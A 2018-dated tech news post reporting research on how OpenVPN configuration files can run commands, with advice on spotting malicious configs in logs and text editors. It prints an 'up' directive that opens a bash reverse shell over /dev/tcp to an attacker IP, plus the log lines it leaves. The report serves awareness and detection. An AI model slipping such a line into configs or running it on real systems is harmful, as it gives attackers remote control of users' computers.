Category: IT|Jun 23, 2018 | Author: Admin

Downloading 3rd Party OpenVPN Configs May Be Dangerous. Here’s Why.

Share on

Call me a cynic, but one thing I have learned from the using the Internet is to double-check, if not triple-check, everything you download. So many downloads have malware, adware, and scripts that perform malicious activities on your computer that it has to be a requirement to thoroughly check a download before it's used.

Call me a cynic, but one thing I have learned from the using the Internet is to double-check, if not triple-check, everything you download. So many downloads have malware, adware, and scripts that perform malicious activities on your computer that it has to be a requirement to thoroughly check a download before it's used.

This point is shown in research posted by Tenable reverse engineer Jacob Baines, where he shows how a normally harmless VPN configuration file can be used to open a backdoor on a computer that uses it. 

OpenVPN configs can execute commands
In his article, Baines explains how a simple OpenVPN configuration file can be used to execute commands on a computer after a VPN connection is made. This could also attackers to distribute OpenVPN configuration files that automatically execute commands to open backdoors through a reverse shell or perform other unwanted behavior on the computer.

OpenVPN is a popular open-source VPN program that allows you to create a secure and encrypted network connection between your computer or device and another network. Due to its popularity, it has been ported to work on a variety of devices, including routers that run DD-WRT. To facilitate this, VPN providers create OpenVPN profiles that can be downloaded and installed in order to easily configure a VPN connection.

According to Baines, to do this all a bad actor would need to do is to add a few lines to a harmless OpenVPN configuration file (.opvpn) to make it malicious. In Baines' example, an OpenVPN configuration file is simply a text file with some commands in it:

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun

If an actor wanted to cause the OpenVPN configuration file to execute a command they would add the "script-security 2" line, which allows user-defined scripts to be executed,  and an "up" entry, which contains the command that is executed after a connection has been made.  As an example, he changed the above configuration file so that it executes a command as shown below.

remote 192.168.1.245
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&’”

When this configuration file is used and after a connection has been established, OpenVPN will execute the above command to open a reverse shell to the computer at 192.168.1.218. This would allow the attacker at that IP address to execute commands on the remote computer that ran the OpenVPN configuration file.

Baines even goes on to show how the above method could be ported to attack Windows users by using a PowerShell script instead.

While this shows you should be careful about downloading OpenVPN configs from third-parties, Baines told BleepingComputer that he has not found any malicious configs currently in the wild.

How do you detect malicious OpenVPN configuration files?
Now that you know that OpenVPN configuration could be used against you, you may be wondering how to check if any that you use are malicious.

In his article, Baines states that you can find clues in a VPN connection log as shown below.

Thu Jun 7 12:28:23 2018 NOTE: the current — script-security setting may allow this configuration to call user-defined scripts
Thu Jun 7 12:28:23 2018 /bin/bash -c /bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1& tun0 1500 1500 10.200.0.2 10.200.0.1 init

If you see the above lines in your log, it means the "script-security 2" setting was used, which allows user-defined scripts to be executed. As that line is required to run scripts, it would follow that something is being executed by the configuration file. You should be able to spot the command being executed as shown by the second line in the log above.

As OpenVPN configuration files simply text files, you can also check if an OpenVPN configuration is malicious by opening the file up in Notepad or another text editor. This will allow you to see the entire configuration file and spot if any commands are being executed.

Unfortunately, OpenVPN has other configuration directives that can execute commands as well and Baines recommends users use the Viscosity OpenVPN instead, which can filter out these types of commands.

"Unfortunately, the up command is not the only command that can be used in this way," Baines told BleepingComputer. "Up, down, client-connect, learn-address, auth-user-pass-verify, and learn-address all execute configuration specified commands (although some of these are server specific). A layperson might try to review and understand the configuration file. However, I think it's safer to use a client like viscosity that simply filters out this behavior."

Sponsored Ads:

Comments:


Think Xbox may die

Category: Microsoft|Mar 29, 2024 | Author: Admin

Locked out 8 million Telegram users, then this happened

Category: IT|Mar 28, 2024 | Author: Admin

Mac update fixes important bugs

Category: Apple|Mar 27, 2024 | Author: Admin

The Windows Format Dialog Remains Unchanged After 30 Years

Category: Microsoft|Mar 26, 2024 | Author: Admin

Google's new AI search results promotes sites pushing malware, scams

Category: Google|Mar 25, 2024 | Author: Admin

YouTube ordered not to talk about it

Category: IT|Mar 24, 2024 | Author: Admin

It became too difficult for Apple

Category: Apple|Mar 23, 2024 | Author: Admin

Windows 11 Notepad finally gets spellcheck and autocorrect

Category: Microsoft|Mar 22, 2024 | Author: Admin

This is how Android 15 gets better

Category: Google|Mar 21, 2024 | Author: Admin

Warns Apple

Category: Apple|Mar 20, 2024 | Author: Admin

Microsoft again bothers Chrome users with Bing popup ads in Windows

Category: Microsoft|Mar 19, 2024 | Author: Admin

Increased by 164 percent

Category: IT|Mar 18, 2024 | Author: Admin

Anthropic launches its fastest and cheapest AI model yet

Category: IT|Mar 17, 2024 | Author: Admin

What is Darwin AI and how could Apple use its new tech?

Category: Apple|Mar 16, 2024 | Author: Admin

DO NOT update Minecraft!

Category: IT|Mar 15, 2024 | Author: Admin
more